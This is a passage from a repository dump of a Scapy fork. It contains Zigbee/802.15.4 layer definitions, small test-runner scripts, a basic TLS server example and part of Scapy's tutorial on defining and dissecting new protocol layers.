Packet.guess_payload_class(self, payload)\n\n# Zigbee Encapsulation Protocol\n\n\nclass ZEP2(Packet):\n name = \"Zigbee Encapsulation Protocol (V2)\"\n 
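# ZEP v2 header (read off the fields below): \"EX\" preamble, version, type, channel, device id, LQI mode/value, timestamp, sequence number, 10 reserved bytes and a length byte.\n 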
fields_desc = [\n StrFixedLenField(\"preamble\", \"EX\", length=2),\n ByteField(\"ver\", 0),\n ByteField(\"type\", 0),\n ByteField(\"channel\", 0),\n ShortField(\"device\", 0),\n ByteField(\"lqi_mode\", 1),\n ByteField(\"lqi_val\", 0),\n TimeStampField(\"timestamp\", 0),\n IntField(\"seq\", 0),\n BitField(\"res\", 0, 80), # 10 bytes reserved field\n ByteField(\"length\", 0),\n ]\n\n @classmethod\n def dispatch_hook(cls, _pkt=b\"\", *args, **kargs):\n if _pkt and len(_pkt) >= 4:\n v = orb(_pkt[2])\n if v == 1:\n return ZEP1\n elif v == 2:\n return ZEP2\n return cls\n\n def guess_payload_class(self, payload):\n if self.lqi_mode:\n return Dot15d4\n else:\n return Dot15d4FCS\n\n\nclass ZEP1(ZEP2):\n name = \"Zigbee Encapsulation Protocol (V1)\"\n fields_desc = [\n StrFixedLenField(\"preamble\", \"EX\", length=2),\n ByteField(\"ver\", 0),\n ByteField(\"channel\", 0),\n ShortField(\"device\", 0),\n ByteField(\"lqi_mode\", 0),\n ByteField(\"lqi_val\", 0),\n BitField(\"res\", 0, 56), # 7 bytes reserved field\n ByteField(\"len\", 0),\n ]\n\n\n# Bindings #\nbind_layers(Dot15d4, Dot15d4Beacon, fcf_frametype=0)\nbind_layers(Dot15d4, Dot15d4Data, fcf_frametype=1)\nbind_layers(Dot15d4, Dot15d4Ack, fcf_frametype=2)\nbind_layers(Dot15d4, Dot15d4Cmd, fcf_frametype=3)\nbind_layers(Dot15d4FCS, Dot15d4Beacon, fcf_frametype=0)\nbind_layers(Dot15d4FCS, Dot15d4Data, fcf_frametype=1)\nbind_layers(Dot15d4FCS, Dot15d4Ack, fcf_frametype=2)\nbind_layers(Dot15d4FCS, Dot15d4Cmd, fcf_frametype=3)\n# TODO: find a way to chose between ZigbeeNWK and SixLoWPAN (cf. sixlowpan.py)\n# bind_layers( Dot15d4Data, ZigbeeNWK)\nbind_layers(ZigbeeAppDataPayload, ZigbeeAppCommandPayload, frametype=1)\nbind_layers(Dot15d4Beacon, ZigBeeBeacon)\n\nbind_bottom_up(UDP, ZEP2, sport=17754)\nbind_bottom_up(UDP, ZEP2, sport=17754)\nbind_layers(UDP, ZEP2, sport=17754, dport=17754)\n\n# DLT Types #\nconf.l2types.register(195, Dot15d4FCS)\nconf.l2types.register(230, Dot15d4)\n" }, { "alpha_fraction": 0.449438214302063, "alphanum_fraction": 0.45505619049072266, "avg_line_length": 58.33333206176758, "blob_id": "2e93bf424b08091e3b0d7d9f9f081558661e1eeb", "content_id": "eebaba60135a9681186d726fd80b7ddd2b0a371a", "detected_licenses": [ "MIT", "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 178, "license_type": "permissive", "max_line_length": 142, "num_lines": 3, "path": "/scapy/test/import_tester", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "#! /bin/bash\ncd \"$(dirname $0)/..\"\nfind scapy -name '*.py' | sed -e 's#/#.#g' -e 's/\\(\\.__init__\\)\\?\\.py$//' | while read a; do echo \"######### $a\"; python -c \"import $a\"; done\n" }, { "alpha_fraction": 0.6549707651138306, "alphanum_fraction": 0.6608186960220337, "avg_line_length": 33.20000076293945, "blob_id": "3fd95dbfa4eba4b41661c284b4b30ea781abad4c", "content_id": "e875227faf9bb4faa8654fa1bb88bb3f181d38b1", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 342, "license_type": "permissive", "max_line_length": 157, "num_lines": 10, "path": "/scapy/test/run_tests", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "#! 
/bin/sh\nDIR=$(dirname $0)/..\nPYTHON=${PYTHON:-python}\nPYTHONDONTWRITEBYTECODE=\"True\"\nif [ -z \"$*\" ]\nthen\n PYTHONPATH=$DIR exec $PYTHON ${DIR}/scapy/tools/UTscapy.py -t regression.uts -f html -K ipv6 -l -o /tmp/scapy_regression_test_$(date +%Y%m%d-%H%M%S).html\nelse\n PYTHONPATH=$DIR exec $PYTHON ${DIR}/scapy/tools/UTscapy.py \"$@\"\nfi\n" }, { "alpha_fraction": 0.676300585269928, "alphanum_fraction": 0.6890173554420471, "avg_line_length": 26.870967864990234, "blob_id": "800b7e8b24648467597dc4682f924b0a4b4a37b2", "content_id": "ed740aa74e95cd026e4acab00fe0d1ba82acf596", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 865, "license_type": "permissive", "max_line_length": 76, "num_lines": 31, "path": "/scapy/test/tls/example_server.py", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n## This file is part of Scapy\n## This program is published under a GPLv2 license\n\n\"\"\"\nBasic TLS server. A preferred ciphersuite may be provided as first argument.\n\nFor instance, \"sudo ./server_simple.py c014\" will start a server accepting\nany TLS client connection. If provided, TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA\nwill be preferred to any other suite the client might propose.\n\"\"\"\n\nimport os\nimport sys\n\nbasedir = os.path.abspath(os.path.join(os.path.dirname(__file__),\"../../\"))\nsys.path=[basedir]+sys.path\n\nfrom scapy.layers.tls.automaton_srv import TLSServerAutomaton\n\n\nif len(sys.argv) == 2:\n pcs = int(sys.argv[1], 16)\nelse:\n pcs = None\n\nt = TLSServerAutomaton(mycert=basedir+'/test/tls/pki/srv_cert.pem',\n mykey=basedir+'/test/tls/pki/srv_key.pem',\n preferred_ciphersuite=pcs)\nt.run()\n\n" }, { "alpha_fraction": 0.5614035129547119, "alphanum_fraction": 0.5964912176132202, "avg_line_length": 18, "blob_id": "be3a842eea050bbd15f88fc38a5ad8e7f9a6d8fa", "content_id": "3fe3b8a6e97d5090e004043ab539955dec9f01d9", "detected_licenses": [ "MIT", "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 57, "license_type": "permissive", "max_line_length": 30, "num_lines": 3, "path": "/scapy/test/run_tests_py3", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "#! /bin/sh\nPYTHON=python3\n. $(dirname $0)/run_tests \"$@\"\n" }, { "alpha_fraction": 0.6263659596443176, "alphanum_fraction": 0.6452690362930298, "avg_line_length": 33.26619338989258, "blob_id": "fd1c143d30e25107423300efa3143994a5db6ed7", "content_id": "60bd2f6cd24eaa035f83ceff302a229ad19f215a", "detected_licenses": [ "MIT", "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 38626, "license_type": "permissive", "max_line_length": 821, "num_lines": 1127, "path": "/scapy/doc/scapy/build_dissect.rst", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "********************\nAdding new protocols\n********************\n\nAdding new protocol (or more correctly: a new *layer*) in Scapy is very easy. All the magic is in the fields. If the \nfields you need are already there and the protocol is not too brain-damaged, \nthis should be a matter of minutes. \n\nSimple example\n==============\n\nA layer is a subclass of the ``Packet`` class. 
All the logic behind layer manipulation \nis held by the ``Packet`` class and will be inherited. \nA simple layer is compounded by a list of fields that will be either concatenated \nwhen assembling the layer or dissected one by one when disassembling a string. \nThe list of fields is held in an attribute named ``fields_desc``. Each field is an instance \nof a field class:: \n\n class Disney(Packet): \n name = \"DisneyPacket \" \n fields_desc=[ ShortField(\"mickey\",5), \n XByteField(\"minnie\",3) , \n IntEnumField(\"donald\" , 1 , \n { 1: \"happy\", 2: \"cool\" , 3: \"angry\" } ) ]\n \nIn this example, our layer has three fields. The first one is a 2-byte integer \nfield named ``mickey`` and whose default value is 5. The second one is a 1-byte \ninteger field named ``minnie`` and whose default value is 3. The difference between \na vanilla ``ByteField`` and an ``XByteField`` is only the fact that the preferred human \nrepresentation of the field’s value is in hexadecimal. The last field is a 4-byte \ninteger field named ``donald``. It is different from a vanilla ``IntField`` by the fact \nthat some of the possible values of the field have literate representations. For \nexample, if it is worth 3, the value will be displayed as angry. Moreover, if the \n\"cool\" value is assigned to this field, it will understand that it has to take the \nvalue 2. \n\nIf your protocol is as simple as this, it is ready to use:: \n\n >>> d=Disney(mickey=1) \n >>> ls(d) \n mickey : ShortField = 1 (5) \n minnie : XByteField = 3 (3) \n donald : IntEnumField = 1 (1) \n >>> d.show() \n ###[ Disney Packet ]### \n mickey= 1 \n minnie= 0x3 \n donald= happy \n >>> d.donald=\"cool\" \n >>> raw(d)\n ’\\x00\\x01\\x03\\x00\\x00\\x00\\x02’ \n >>> Disney( ) \n <Disney mickey=1 minnie=0x3 donald=cool |> \n\n\nThis chapter explains how to build a new protocol within Scapy. There are two main objectives:\n\n* Dissecting: this is done when a packet is received (from the network or a file) and should be converted to Scapy’s internals.\n* Building: When one wants to send such a new packet, some stuff needs to be adjusted automatically in it.\n\nLayers\n======\n\nBefore digging into dissection itself, let us look at how packets are\norganized.\n\n::\n\n >>> p = IP()/TCP()/\"AAAA\"\n >>> p\n <IP frag=0 proto=TCP |<TCP |<Raw load='AAAA' |>>>\n >>> p.summary()\n 'IP / TCP 127.0.0.1:ftp-data > 127.0.0.1:www S / Raw'\n\nWe are interested in 2 \"inside\" fields of the class ``Packet``:\n\n* ``p.underlayer``\n* ``p.payload``\n\nAnd here is the main \"trick\". You do not care about packets, only\nabout layers, stacked one after the other. \n\nOne can easily access a layer by its name: ``p[TCP]`` returns the ``TCP``\nand followings layers. This is a shortcut for ``p.getlayer(TCP)``.\n\n.. note::\n There is an optional argument (``nb``) which returns the ``nb`` th layer of required protocol.\n\nLet's put everything together now, playing with the ``TCP`` layer::\n\n >>> tcp=p[TCP]\n >>> tcp.underlayer\n <IP frag=0 proto=TCP |<TCP |<Raw load='AAAA' |>>>\n >>> tcp.payload\n <Raw load='AAAA' |>\n\nAs expected, ``tcp.underlayer`` points to the beginning of our IP packet,\nand ``tcp.payload`` to its payload.\n\nBuilding a new layer\n--------------------\n\n.. index::\n single: Layer\n\nVERY EASY! A layer is mainly a list of fields. 
Let's look at ``UDP`` definition::\n\n class UDP(Packet):\n name = \"UDP\"\n fields_desc = [ ShortEnumField(\"sport\", 53, UDP_SERVICES),\n ShortEnumField(\"dport\", 53, UDP_SERVICES),\n ShortField(\"len\", None),\n XShortField(\"chksum\", None), ]\n\nAnd you are done! There are many fields already defined for\nconvenience, look at the doc``^W`` sources as Phil would say.\n\nSo, defining a layer is simply gathering fields in a list. The goal is\nhere to provide the efficient default values for each field so the\nuser does not have to give them when he builds a packet. \n\nThe main mechanism is based on the ``Field`` structure. Always keep in\nmind that a layer is just a little more than a list of fields, but not\nmuch more. \n\nSo, to understand how layers are working, one needs to look quickly\nat how the fields are handled.\n\n\nManipulating packets == manipulating its fields\n-----------------------------------------------\n\n.. index::\n single: i2h()\n single: i2m()\n single: m2i()\n\nA field should be considered in different states:\n\n- ``i`` (nternal) : this is the way Scapy manipulates it.\n- ``m`` (achine) : this is where the truth is, that is the layer as it is\n on the network.\n- ``h`` (uman) : how the packet is displayed to our human eyes.\n\nThis explains the mysterious methods ``i2h()``, ``i2m()``, ``m2i()`` and so on\navailable in each field: they are the conversion from one state to\nanother, adapted to a specific use.\n\nOther special functions:\n\n- ``any2i()`` guess the input representation and returns the internal one.\n- ``i2repr()`` a nicer ``i2h()``\n\nHowever, all these are \"low level\" functions. The functions adding or\nextracting a field to the current layer are:\n\n- ``addfield(self, pkt, s, val)``: copy the network representation of\n field ``val`` (belonging to layer ``pkt``) to the raw string packet ``s``::\n\n class StrFixedLenField(StrField):\n def addfield(self, pkt, s, val):\n return s+struct.pack(\"%is\"%self.length,self.i2m(pkt, val))\n\n- ``getfield(self, pkt, s)``: extract from the raw packet ``s`` the field\n value belonging to layer ``pkt``. It returns a list, the 1st element\n is the raw packet string after having removed the extracted field,\n the second one is the extracted field itself in internal\n representation::\n\n class StrFixedLenField(StrField):\n def getfield(self, pkt, s):\n return s[self.length:], self.m2i(pkt,s[:self.length])\n \nWhen defining your own layer, you usually just need to define some\n``*2*()`` methods, and sometimes also the ``addfield()`` and ``getfield()``.\n\n\nExample: variable length quantities\n-----------------------------------\n\nThere is a way to represent integers on a variable length quantity often\nused in protocols, for instance when dealing with signal processing\n(e.g. MIDI). \n\nEach byte of the number is coded with the MSB set to 1, except the\nlast byte. 
For instance, 0x123456 will be coded as 0xC8E856:: \n\n def vlenq2str(l):\n s = []\n s.append( hex(l & 0x7F) )\n l = l >> 7\n while l>0:\n s.append( hex(0x80 | (l & 0x7F) ) )\n l = l >> 7\n s.reverse()\n return \"\".join(chr(int(x, 16)) for x in s)\n \n def str2vlenq(s=\"\"):\n i = l = 0\n while i<len(s) and ord(s[i]) & 0x80:\n l = l << 7\n l = l + (ord(s[i]) & 0x7F)\n i = i + 1\n if i == len(s):\n warning(\"Broken vlenq: no ending byte\")\n l = l << 7\n l = l + (ord(s[i]) & 0x7F)\n \n return s[i+1:], l\n\nWe will define a field which computes automatically the length of an\nassociated string, but used that encoding format::\n\n class VarLenQField(Field):\n \"\"\" variable length quantities \"\"\"\n __slots__ = [\"fld\"]\n \n def __init__(self, name, default, fld):\n Field.__init__(self, name, default)\n self.fld = fld\n \n def i2m(self, pkt, x):\n if x is None:\n f = pkt.get_field(self.fld)\n x = f.i2len(pkt, pkt.getfieldval(self.fld))\n x = vlenq2str(x)\n return raw(x)\n \n def m2i(self, pkt, x):\n if s is None:\n return None, 0\n return str2vlenq(x)[1]\n \n def addfield(self, pkt, s, val):\n return s+self.i2m(pkt, val)\n \n def getfield(self, pkt, s):\n return str2vlenq(s)\n\nAnd now, define a layer using this kind of field::\n\n class FOO(Packet):\n name = \"FOO\"\n fields_desc = [ VarLenQField(\"len\", None, \"data\"),\n StrLenField(\"data\", \"\", \"len\") ]\n \n >>> f = FOO(data=\"A\"*129)\n >>> f.show()\n ###[ FOO ]###\n len= 0\n data= 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'\n\nHere, ``len`` is not yet computed and only the default value are\ndisplayed. This is the current internal representation of our\nlayer. Let's force the computation now::\n\n >>> f.show2()\n ###[ FOO ]###\n len= 129\n data= 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'\n\nThe method ``show2()`` displays the fields with their values as they will\nbe sent to the network, but in a human readable way, so we see ``len=129``.\nLast but not least, let us look now at the machine representation::\n\n >>> raw(f)\n '\\x81\\x01AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'\n\nThe first 2 bytes are ``\\x81\\x01``, which is 129 in this encoding.\n\n\n \nDissecting \n==========\n.. index::\n dissecting\n \nLayers only are list of fields, but what is the glue between each\nfield, and after, between each layer. These are the mysteries explain\nin this section.\n\nThe basic stuff\n---------------\n\nThe core function for dissection is ``Packet.dissect()``::\n\n def dissect(self, s):\n s = self.pre_dissect(s)\n s = self.do_dissect(s)\n s = self.post_dissect(s) \n payl,pad = self.extract_padding(s)\n self.do_dissect_payload(payl)\n if pad and conf.padding:\n self.add_payload(Padding(pad))\n\nWhen called, ``s`` is a string containing what is going to be\ndissected. ``self`` points to the current layer.\n \n::\n\n >>> p=IP(\"A\"*20)/TCP(\"B\"*32)\n WARNING: bad dataofs (4). Assuming dataofs=5\n >>> p\n <IP version=4L ihl=1L tos=0x41 len=16705 id=16705 flags=DF frag=321L ttl=65 proto=65 chksum=0x4141\n src=65.65.65.65 dst=65.65.65.65 |<TCP sport=16962 dport=16962 seq=1111638594L ack=1111638594L dataofs=4L\n reserved=2L flags=SE window=16962 chksum=0x4242 urgptr=16962 options=[] |<Raw load='BBBBBBBBBBBB' |>>>\n\n``Packet.dissect()`` is called 3 times:\n\n1. 
to dissect the ``\"A\"*20`` as an IPv4 header\n2. to dissect the ``\"B\"*32`` as a TCP header\n3. and since there are still 12 bytes in the packet, they are\n dissected as \"``Raw``\" data (which is some kind of default layer type)\n\n\nFor a given layer, everything is quite straightforward:\n\n- ``pre_dissect()`` is called to prepare the layer.\n- ``do_dissect()`` perform the real dissection of the layer.\n- ``post_dissection()`` is called when some updates are needed on the\n dissected inputs (e.g. deciphering, uncompressing, ... )\n- ``extract_padding()`` is an important function which should be called\n by every layer containing its own size, so that it can tell apart \n in the payload what is really related to this layer and what will\n be considered as additional padding bytes.\n- ``do_dissect_payload()`` is the function in charge of dissecting the\n payload (if any). It is based on ``guess_payload_class()`` (see\n below). Once the type of the payload is known, the payload is bound\n to the current layer with this new type::\n\n def do_dissect_payload(self, s):\n cls = self.guess_payload_class(s)\n p = cls(s, _internal=1, _underlayer=self)\n self.add_payload(p)\n\nAt the end, all the layers in the packet are dissected, and glued\ntogether with their known types.\n\n\nDissecting fields\n-----------------\n\nThe method with all the magic between a layer and its fields is\n``do_dissect()``. If you have understood the different representations of\na layer, you should understand that \"dissecting\" a layer is building\neach of its fields from the machine to the internal representation. \n\nGuess what? That is exactly what ``do_dissect()`` does::\n\n def do_dissect(self, s):\n flist = self.fields_desc[:]\n flist.reverse()\n while s and flist:\n f = flist.pop()\n s,fval = f.getfield(self, s)\n self.fields[f] = fval\n return s\n\nSo, it takes the raw string packet, and feed each field with it, as\nlong as there are data or fields remaining::\n\n >>> FOO(\"\\xff\\xff\"+\"B\"*8)\n <FOO len=2097090 data='BBBBBBB' |>\n\nWhen writing ``FOO(\"\\xff\\xff\"+\"B\"*8)``, it calls ``do_dissect()``. The first\nfield is VarLenQField. Thus, it takes bytes as long as their MSB is\nset, thus until (and including) the first '``B``'. This mapping is done\nthanks to ``VarLenQField.getfield()`` and can be cross-checked::\n\n >>> vlenq2str(2097090)\n '\\xff\\xffB'\n\nThen, the next field is extracted the same way, until 2097090 bytes\nare put in ``FOO.data`` (or less if 2097090 bytes are not available, as\nhere).\n\nIf there are some bytes left after the dissection of the current\nlayer, it is mapped in the same way to the what the next is expected\nto be (``Raw`` by default)::\n\n >>> FOO(\"\\x05\"+\"B\"*8)\n <FOO len=5 data='BBBBB' |<Raw load='BBB' |>>\n\nHence, we need now to understand how layers are bound together.\n\nBinding layers\n--------------\n\nOne of the cool features with Scapy when dissecting layers is that it\ntries to guess for us what the next layer is. The official way to link 2\nlayers is using ``bind_layers()`` function.\n\nAvailable inside the ``packet`` module, this function can be used as following::\n\n bind_layers(ProtoA, ProtoB, FieldToBind=Value)\n\nEach time a packet ``ProtoA()/ProtoB()`` will be created, the ``FieldToBind`` of\n``ProtoA`` will be equal to ``Value``.\n\nFor instance, if you have a class ``HTTP``, you may expect that all the\npackets coming from or going to port 80 will be decoded as such. 
This\nis simply done that way::\n\n bind_layers( TCP, HTTP, sport=80 )\n bind_layers( TCP, HTTP, dport=80 )\n\nThat's all folks! Now every packet related to port 80 will be\nassociated to the layer ``HTTP``, whether it is read from a pcap file or\nreceived from the network.\n\nThe ``guess_payload_class()`` way\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nSometimes, guessing the payload class is not as straightforward as\ndefining a single port. For instance, it can depend on a value of a\ngiven byte in the current layer. The 2 needed methods are:\n\n- ``guess_payload_class()`` which must return the guessed class for the\n payload (next layer). By default, it uses links between classes\n that have been put in place by ``bind_layers()``.\n\n- ``default_payload_class()`` which returns the default value. This\n method defined in the class ``Packet`` returns ``Raw``, but it can be\n overloaded.\n\nFor instance, decoding 802.11 changes depending on whether it is\nciphered or not::\n\n class Dot11(Packet):\n def guess_payload_class(self, payload):\n if self.FCfield & 0x40:\n return Dot11WEP\n else:\n return Packet.guess_payload_class(self, payload)\n\nSeveral comments are needed here:\n\n- this cannot be done using ``bind_layers()`` because the tests are\n supposed to be \"``field==value``\", but it is more complicated here as we\n test a single bit in the value of a field.\n \n- if the test fails, no assumption is made, and we plug back to the\n default guessing mechanisms calling ``Packet.guess_payload_class()``\n\nMost of the time, defining a method ``guess_payload_class()`` is not a\nnecessity as the same result can be obtained from ``bind_layers()``.\n\nChanging the default behavior\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nIf you do not like Scapy's behavior for a given layer, you can either\nchange or disable it through the call to ``split_layer()``. For instance,\nif you do not want UDP/53 to be bound with ``DNS``, just add in your code:\n``\nsplit_layers(UDP, DNS, sport=53)\n``\nNow every packet with source port 53 will not be handled as DNS, but\nwhatever you specify instead.\n\n\n\nUnder the hood: putting everything together\n-------------------------------------------\n\nIn fact, each layer has a field payload_guess. When you use the\nbind_layers() way, it adds the defined next layers to that list.\n\n::\n\n >>> p=TCP()\n >>> p.payload_guess\n [({'dport': 2000}, <class 'scapy.Skinny'>), ({'sport': 2000}, <class 'scapy.Skinny'>), ... )]\n\nThen, when it needs to guess the next layer class, it calls the\ndefault method ``Packet.guess_payload_class()``. This method runs through\neach element of the list payload_guess, each element being a\ntuple:\n\n- the 1st value is a field to test (``'dport': 2000``)\n- the 2nd value is the guessed class if it matches (``Skinny``)\n\nSo, the default ``guess_payload_class()`` tries all element in the list,\nuntil one matches. If no element are found, it then calls\n``default_payload_class()``. If you have redefined this method, then yours\nis called, otherwise, the default one is called, and ``Raw`` type is\nreturned. \n\n``Packet.guess_payload_class()``\n\n- test what is in field ``guess_payload``\n- call overloaded ``guess_payload_class()``\n\n\nBuilding\n========\n\nBuilding a packet is as simple as building each layer. Then, some\nmagic happens to glue everything. Let's do magic then.\n\nThe basic stuff\n---------------\n\nThe first thing to establish is: what does \"build\" mean? 
As we have seen, a\nlayer can be represented in different ways (human, internal,\nmachine). Building means going to the machine format.\n\nThe second thing to understand is ''when'' a layer is built. The answer is not\nthat obvious, but as soon as you need the machine representation, the\nlayers are built: when the packet is dropped on the network or written\nto a file, or when it is converted as a string, ... In fact, machine\nrepresentation should be regarded as a big string with the layers\nappended altogether.\n \n::\n\n >>> p = IP()/TCP()\n >>> hexdump(p)\n 0000 45 00 00 28 00 01 00 00 40 06 7C CD 7F 00 00 01 E..(....@.|..... \n 0010 7F 00 00 01 00 14 00 50 00 00 00 00 00 00 00 00 .......P........ \n 0020 50 02 20 00 91 7C 00 00 P. ..|.. \n\nCalling ``raw()`` builds the packet:\n - non instanced fields are set to their default value\n - lengths are updated automatically\n - checksums are computed\n - and so on. \n\nIn fact, using ``raw()`` rather than ``show2()`` or any other method\nis not a random choice as all the functions building the packet calls\n``Packet.__str__()`` (or ``Packet.__bytes__()`` under Python\n3). However, ``__str__()`` calls another method: ``build()``::\n\n def __str__(self):\n return next(iter(self)).build()\n\nWhat is important also to understand is that usually, you do not care\nabout the machine representation, that is why the human and internal\nrepresentations are here. \n\nSo, the core method is ``build()`` (the code has been shortened to keep\nonly the relevant parts)::\n\n def build(self,internal=0):\n pkt = self.do_build()\n pay = self.build_payload()\n p = self.post_build(pkt,pay)\n if not internal:\n pkt = self\n while pkt.haslayer(Padding):\n pkt = pkt.getlayer(Padding)\n p += pkt.load\n pkt = pkt.payload\n return p\n\nSo, it starts by building the current layer, then the payload, and\n``post_build()`` is called to update some late evaluated fields (like\nchecksums). Last, the padding is added to the end of the packet. \n\nOf course, building a layer is the same as building each of its\nfields, and that is exactly what ``do_build()`` does.\n\nBuilding fields\n---------------\n\nThe building of each field of a layer is called in ``Packet.do_build()``::\n\n def do_build(self):\n p=\"\"\n for f in self.fields_desc:\n p = f.addfield(self, p, self.getfieldval(f))\n return p\n\nThe core function to build a field is ``addfield()``. It takes the\ninternal view of the field and put it at the end of ``p``. Usually, this\nmethod calls ``i2m()`` and returns something like ``p.self.i2m(val)`` (where\n``val=self.getfieldval(f)``).\n\nIf ``val`` is set, then ``i2m()`` is just a matter of formatting the value the\nway it must be. For instance, if a byte is expected, ``struct.pack(\"B\", val)``\nis the right way to convert it.\n\nHowever, things are more complicated if ``val`` is not set, it means no\ndefault value was provided earlier, and thus the field needs to\ncompute some \"stuff\" right now or later. \n\n\"Right now\" means thanks to ``i2m()``, if all pieces of information are\navailable. For instance, if you have to handle a length until a\ncertain delimiter. 
\n\nEx: counting the length until a delimiter\n\n::\n\n class XNumberField(FieldLenField):\n \n def __init__(self, name, default, sep=\"\\r\\n\"):\n FieldLenField.__init__(self, name, default, fld)\n self.sep = sep\n \n def i2m(self, pkt, x):\n x = FieldLenField.i2m(self, pkt, x)\n return \"%02x\" % x\n \n def m2i(self, pkt, x):\n return int(x, 16)\n \n def addfield(self, pkt, s, val):\n return s+self.i2m(pkt, val)\n \n def getfield(self, pkt, s):\n sep = s.find(self.sep)\n return s[sep:], self.m2i(pkt, s[:sep])\n\nIn this example, in ``i2m()``, if ``x`` has already a value, it is converted\nto its hexadecimal value. If no value is given, a length of \"0\" is\nreturned.\n\nThe glue is provided by ``Packet.do_build()`` which calls ``Field.addfield()``\nfor each field in the layer, which in turn calls ``Field.i2m()``: the\nlayer is built IF a value was available.\n\n\nHandling default values: ``post_build``\n---------------------------------------\n\nA default value for a given field is sometimes either not known or\nimpossible to compute when the fields are put together. For instance,\nif we used a ``XNumberField`` as defined previously in a layer, we expect\nit to be set to a given value when the packet is built. However,\nnothing is returned by ``i2m()`` if it is not set. \n\nThe answer to this problem is ``Packet.post_build()``. \n\nWhen this method is called, the packet is already built, but some\nfields still need to be computed. This is typically what is required\nto compute checksums or lengths. In fact, this is required each time a\nfield's value depends on something which is not in the current \n\nSo, let us assume we have a packet with a ``XNumberField``, and have a\nlook to its building process::\n\n class Foo(Packet):\n fields_desc = [\n ByteField(\"type\", 0),\n XNumberField(\"len\", None, \"\\r\\n\"),\n StrFixedLenField(\"sep\", \"\\r\\n\", 2)\n ]\n \n def post_build(self, p, pay):\n if self.len is None and pay:\n l = len(pay)\n p = p[:1] + hex(l)[2:]+ p[2:]\n return p+pay\n\nWhen ``post_build()`` is called, ``p`` is the current layer, ``pay`` the payload,\nthat is what has already been built. We want our length to be the full\nlength of the data put after the separator, so we add its computation\nin ``post_build()``. \n\n::\n\n >>> p = Foo()/(\"X\"*32)\n >>> p.show2()\n ###[ Foo ]###\n type= 0\n len= 32\n sep= '\\r\\n'\n ###[ Raw ]###\n load= 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'\n\n``len`` is correctly computed now::\n\n >>> hexdump(raw(p))\n 0000 00 32 30 0D 0A 58 58 58 58 58 58 58 58 58 58 58 .20..XXXXXXXXXXX\n 0010 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX\n 0020 58 58 58 58 58 XXXXX\n\nAnd the machine representation is the expected one.\n\n\nHandling default values: automatic computation\n----------------------------------------------\n\nAs we have previously seen, the dissection mechanism is built upon the\nlinks between the layers created by the programmer. However, it can\nalso be used during the building process.\n\nIn the layer ``Foo()``, our first byte is the type, which defines what\ncomes next, e.g. if ``type=0``, next layer is ``Bar0``, if it is 1, next layer\nis ``Bar1``, and so on. 
We would like then this field to be set\nautomatically according to what comes next.\n \n::\n\n class Bar1(Packet):\n fields_desc = [\n IntField(\"val\", 0),\n ]\n \n class Bar2(Packet):\n fields_desc = [\n IPField(\"addr\", \"127.0.0.1\")\n ]\n\nIf we use these classes with nothing else, we will have trouble when\ndissecting the packets as nothing binds Foo layer with the multiple\n``Bar*`` even when we explicitly build the packet through the call to\n``show2()``::\n\n >>> p = Foo()/Bar1(val=1337)\n >>> p\n <Foo |<Bar1 val=1337 |>>\n >>> p.show2()\n ###[ Foo ]###\n type= 0\n len= 4\n sep= '\\r\\n'\n ###[ Raw ]###\n load= '\\x00\\x00\\x059'\n\nProblems:\n \n1. ``type`` is still equal to 0 while we wanted it to be automatically\n set to 1. We could of course have built ``p`` with ``p = Foo(type=1)/Bar0(val=1337)``\n but this is not very convenient.\n \n2. the packet is badly dissected as ``Bar1`` is regarded as ``Raw``. This\n is because no links have been set between ``Foo()`` and ``Bar*()``.\n\nIn order to understand what we should have done to obtain the proper\nbehavior, we must look at how the layers are assembled. When two\nindependent packets instances ``Foo()`` and ``Bar1(val=1337)`` are\ncompounded with the '/' operator, it results in a new packet where the\ntwo previous instances are cloned (i.e. are now two distinct objects\nstructurally different, but holding the same values)::\n\n def __div__(self, other):\n if isinstance(other, Packet):\n cloneA = self.copy()\n cloneB = other.copy()\n cloneA.add_payload(cloneB)\n return cloneA\n elif type(other) is str:\n return self/Raw(load=other)\n\nThe right-hand side of the operator becomes the payload of the left-hand\nside. This is performed through the call to ``add_payload()``. Finally, the new packet is returned.\n\nNote: we can observe that if other isn't a ``Packet`` but a string,\nthe ``Raw`` class is instantiated to form the payload. Like in this\nexample::\n\n >>> IP()/\"AAAA\"\n <IP |<Raw load='AAAA' |>>\n\nWell, what ``add_payload()`` should implement? Just a link between\ntwo packets? Not only, in our case, this method will appropriately set\nthe correct value to ``type``.\n\nInstinctively we feel that the upper 